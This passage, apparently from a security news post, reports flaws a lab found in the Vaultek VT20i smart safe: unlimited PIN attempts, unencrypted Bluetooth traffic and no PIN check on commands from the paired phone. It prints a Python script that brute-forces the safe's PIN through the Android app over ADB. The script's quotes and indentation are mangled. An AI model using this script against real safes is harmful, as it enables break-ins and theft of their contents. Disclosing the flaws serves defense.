The security company tested out a Vaultek VT20i safe, which owners can lock with a PIN and pair with an Android App. The app uses a pairing code that is the same as the PIN, and allows an unlimited number of attempts to get in. The lab was able to write a program to use brute force to guess the password. Furthermore, the researchers found that the connection between the phone and the safe aren’t encrypted (contrary to the Vaultek’s claims), meaning that the information could be intercepted. They also discovered that the safe doesn’t verify a PIN code coming from the paired phone, which means that it can be unlocked with the right command, even if the PIN is incorrect.
Below we have a quick and dirty Python script that was written to interact with the phone over ADB and input sequential key combinations.
When the script iterates to the correct pin/key, the safe will pop open.
import os
import itertools
import time
for combination in itertools.product(xrange(1,6),repeat=4):
print ”.join(map(str,combination))
os.system(“adb shell input touchscreen tap 600 600”)
time.sleep(5)
os.system(“adb shell input text”+ ‘ “‘ + ”.join(map(str,combination)) + ‘”‘)
time.sleep(1)
os.system(“adb shell input touchscreen tap 500 1100”)
time.sleep(1)
os.system(“adb shell input touchscreen tap 850 770”)
